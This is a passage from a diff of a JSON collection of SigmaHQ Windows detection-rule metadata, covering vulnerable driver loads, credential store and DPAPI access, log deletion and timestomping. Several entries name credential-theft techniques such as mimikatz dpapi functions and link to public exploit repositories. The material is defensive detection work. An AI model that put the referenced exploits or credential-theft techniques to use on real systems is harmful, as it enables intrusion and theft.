"windows", - "refs": [ - "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_dell_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" - ] - }, - "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", - "value": "Vulnerable Dell BIOS Update Driver Load" - }, - { - "description": "Detects the load of known vulnerable drivers by hash value", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/18", - "falsepositive": [ - "Unknown" - ], - "filename": "driver_load_vuln_drivers.yml", - "level": "high", - "logsource.category": "driver_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/jbaines-r7/dellicious", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", - "https://github.com/namazso/physmem_drivers", - "https://github.com/stong/CVE-2020-15368", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", - "https://github.com/tandasat/ExploitCapcom", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", - "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", - "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", - "value": "Vulnerable Driver Load" - }, - { - "description": "Detects the load of known vulnerable drivers via their names only.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/03", - "falsepositive": [ - "Some false positives may occure if one of the vulnerable driver names mentioned above didn't change it's name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or it's exact known legitimate location (when possible)" - ], - "filename": "driver_load_vuln_drivers_names.yml", - "level": "medium", - "logsource.category": "driver_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/jbaines-r7/dellicious", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", - "https://github.com/namazso/physmem_drivers", - "https://github.com/stong/CVE-2020-15368", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", - "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers_names.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", - "value": "Vulnerable Driver Load By Name" - }, { "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", "meta": { @@ -21532,17 +22825,17 @@ "falsepositive": [ "Unknown" ], - "filename": "driver_load_vuln_gigabyte_driver.yml", + "filename": "driver_load_win_vuln_gigabyte_driver.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", - "https://twitter.com/malmoeb/status/1551449425842786306", - "https://github.com/fengjixuchui/gdrv-loader", "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_gigabyte_driver.yml" + "https://twitter.com/malmoeb/status/1551449425842786306", + "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", + "https://github.com/fengjixuchui/gdrv-loader", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml" ], "tags": [ "attack.privilege_escalation", @@ -21560,13 +22853,13 @@ "falsepositive": [ "Unlikely" ], - "filename": "driver_load_vuln_hevd_driver.yml", + "filename": "driver_load_win_vuln_hevd_driver.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://github.com/hacksysteam/HackSysExtremeVulnerableDriver", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hevd_driver.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml" ], "tags": [ "attack.privilege_escalation", @@ -21577,55 +22870,65 @@ "value": "Vulnerable HackSys Extreme Vulnerable Driver Load" }, { - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "description": "Detects the load of known vulnerable drivers via their names only.", "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/26", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/03", + "falsepositive": [ + "False positives may occure if one of the vulnerable driver names mentioned above didn't change it's name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or it's exact known legitimate location (when possible)" + ], + "filename": "driver_load_win_vuln_drivers_names.yml", + "level": "medium", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/namazso/physmem_drivers", + "https://github.com/jbaines-r7/dellicious", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", + "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", + "https://github.com/stong/CVE-2020-15368", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" + ] + }, + "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", + "value": "Vulnerable Driver Load By Name" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", "falsepositive": [ "Unknown" ], - "filename": "driver_load_vuln_hw_driver.yml", + "filename": "driver_load_win_powershell_script_installed_as_service.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", - "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hw_driver.yml" + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_powershell_script_installed_as_service.yml" ], "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ] }, - "uuid": "9bacc538-d1b9-4d42-862e-469eafc05a41", - "value": "Vulnerable HW Driver Load" - }, - { - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/10", - "falsepositive": [ - "Legitimate driver loads (old driver that didn't receive an update)" - ], - "filename": "driver_load_vuln_lenovo_driver.yml", - "level": "high", - "logsource.category": "driver_load", - "logsource.product": "windows", - "refs": [ - "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", - "https://github.com/alfarom256/CVE-2022-3699/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_lenovo_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" - ] - }, - "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "value": "Vulnerable Lenovo Driver Load" + "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "value": "PowerShell Scripts Run by a Services" }, { "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", @@ -21635,14 +22938,14 @@ "falsepositive": [ "Unknown" ], - "filename": "driver_load_vuln_winring0_driver.yml", + "filename": "driver_load_win_vuln_winring0_driver.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_winring0_driver.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml" ], "tags": [ "attack.privilege_escalation", @@ -21660,14 +22963,14 @@ "falsepositive": [ "Legitimate WinDivert driver usage" ], - "filename": "driver_load_windivert.yml", + "filename": "driver_load_win_windivert.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://reqrypt.org/windivert-doc.html", "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_windivert.yml" + "https://reqrypt.org/windivert-doc.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_windivert.yml" ], "tags": [ "attack.collection", @@ -21680,477 +22983,1245 @@ "value": "WinDivert Driver Load" }, { - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "meta": { - "author": "frack113", - "creation_date": "2022/04/09", - "falsepositive": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" - ], - "filename": "file_access_win_browser_credential_stealing.yml", - "level": "medium", - "logsource.category": "file_access", - "logsource.product": "windows", - "refs": [ - "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", - "https://github.com/lclevy/firepwd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" - ], - "tags": [ - "attack.t1003", - "attack.credential_access" - ] - }, - "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "value": "Browser Credential Store Access" - }, - { - "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "description": "Detects the load of known vulnerable drivers by hash value", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/11", - "falsepositive": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." - ], - "filename": "file_access_win_credential_manager_stealing.yml", - "level": "medium", - "logsource.category": "file_access", - "logsource.product": "windows", - "refs": [ - "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" - ], - "tags": [ - "attack.t1003", - "attack.credential_access" - ] - }, - "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", - "value": "Credential Manager Access" - }, - { - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/17", + "creation_date": "2022/08/18", "falsepositive": [ "Unknown" ], - "filename": "file_access_win_dpapi_master_key_access.yml", - "level": "medium", - "logsource.category": "file_access", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ] - }, - "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", - "value": "Suspicious Access To Windows DPAPI Master Keys" - }, - { - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "file_access_win_susp_cred_hist_access.yml", - "level": "medium", - "logsource.category": "file_access", - "logsource.product": "windows", - "refs": [ - "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", - "https://www.passcape.com/windows_password_recovery_dpapi_credhist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ] - }, - "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "value": "Suspicious Access To Windows Credential History File" - }, - { - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/08/12", - "falsepositive": [ - "Changes made to or by the local NTP service" - ], - "filename": "file_change_win_2022_timestomping.yml", + "filename": "driver_load_win_vuln_drivers.yml", "level": "high", - "logsource.category": "file_change", + "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" + "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", + "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/namazso/physmem_drivers", + "https://github.com/jbaines-r7/dellicious", + "https://github.com/stong/CVE-2020-15368", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/tandasat/ExploitCapcom", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml" ], "tags": [ - "attack.t1070.006", - "attack.defense_evasion" - ] - }, - "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", - "value": "File Creation Date Changed to Another Year" - }, - { - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml", - "level": "high", - "logsource.category": "file_change", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ] - }, - "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", - "value": "Unusual File Modification by dns.exe" - }, - { - "description": "Detect DLL deletions from Spooler Service driver folder", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/07/01", - "falsepositive": [ - "Unknown" - ], - "filename": "file_delete_win_cve_2021_1675_printspooler_del.yml", - "level": "high", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/cube0x0/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.t1543.003", + "attack.t1068" ] }, - "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "value": "Windows Spooler Service Suspicious File Deletion" + "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "value": "Vulnerable Driver Load" }, { - "description": "Deletion of log files is a known anti-forensic technique", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", "meta": { - "author": "frack113", - "creation_date": "2022/01/16", + "author": "Florian Roth", + "creation_date": "2021/05/05", + "falsepositive": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "filename": "driver_load_win_vuln_dell_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_dell_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543", + "attack.t1068" + ] + }, + "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "value": "Vulnerable Dell BIOS Update Driver Load" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "driver_load_win_mal_creddumper.yml", + "level": "critical", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "value": "Credential Dumping Tools Service Execution" + }, + { + "description": "Detects the load of drivers used by Process Hacker and System Informer", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/16", + "falsepositive": [ + "Legitimate user of process hacker or system informer by low level developers or system administrators" + ], + "filename": "driver_load_win_process_hacker.yml", + "level": "medium", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://processhacker.sourceforge.io/", + "https://systeminformer.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_process_hacker.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ] + }, + "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "value": "Process Hacker and System Informer Driver Load" + }, + { + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/26", "falsepositive": [ "Unknown" ], - "filename": "file_delete_win_delete_appli_log.yml", + "filename": "driver_load_win_vuln_hw_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", + "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "value": "Vulnerable HW Driver Load" + }, + { + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/10", + "falsepositive": [ + "Legitimate driver loads (old driver that didn't receive an update)" + ], + "filename": "driver_load_win_vuln_lenovo_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", + "https://github.com/alfarom256/CVE-2022-3699/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ] + }, + "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "value": "Vulnerable Lenovo Driver Load" + }, + { + "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "Administrative scripts", + "Microsoft IP range" + ], + "filename": "net_connection_win_powershell_network_connection.yml", "level": "low", - "logsource.category": "file_delete", + "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_appli_log.yml" + "https://www.youtube.com/watch?v=DLtJTxMWZ2o", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.execution", + "attack.t1059.001" ] }, - "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", - "value": "Delete Log from Application" + "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "value": "PowerShell Network Connections" }, { - "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "description": "Detects an executable in the Windows folder accessing github.com", + "meta": { + "author": "Michael Haag (idea), Florian Roth (rule)", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown", + "@subTee in your network" + ], + "filename": "net_connection_win_binary_github_com.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105", + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "value": "Microsoft Binary Github Communication" + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "meta": { "author": "frack113", - "creation_date": "2022/01/02", + "creation_date": "2021/12/10", "falsepositive": [ - "Legitime usage" + "Legitimate python script" ], - "filename": "file_delete_win_delete_backup_file.yml", + "filename": "net_connection_win_python.yml", "level": "medium", - "logsource.category": "file_delete", + "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", - "value": "Deletes Backup Files" - }, - { - "description": "Detects the deletion of a prefetch file (AntiForensic)", - "meta": { - "author": "Cedric MAURUGEON", - "creation_date": "2021/09/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_delete_win_delete_prefetch.yml", - "level": "high", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "value": "Prefetch File Deletion" - }, - { - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/26", - "falsepositive": [ - "Possible FP during log rotation" - ], - "filename": "file_delete_win_exchange_powershell_logs.yml", - "level": "high", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ] - }, - "uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", - "value": "Exchange PowerShell Cmdlet History Deleted" - }, - { - "description": "A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Legitime usage of SDelete" - ], - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", - "level": "medium", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/9", - "https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", - "value": "Sysinternals SDelete File Deletion" - }, - { - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", - "level": "high", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ] - }, - "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", - "value": "Unusual File Deletion by dns.exe" - }, - { - "description": "Detects the deletion of WebServer access logs which may indicate an attempt to destroy forensic evidence", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/16", - "falsepositive": [ - "During uninstallation of the IIS service", - "During log rotation" - ], - "filename": "file_delete_win_webserver_access_logs_deleted.yml", - "level": "medium", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", - 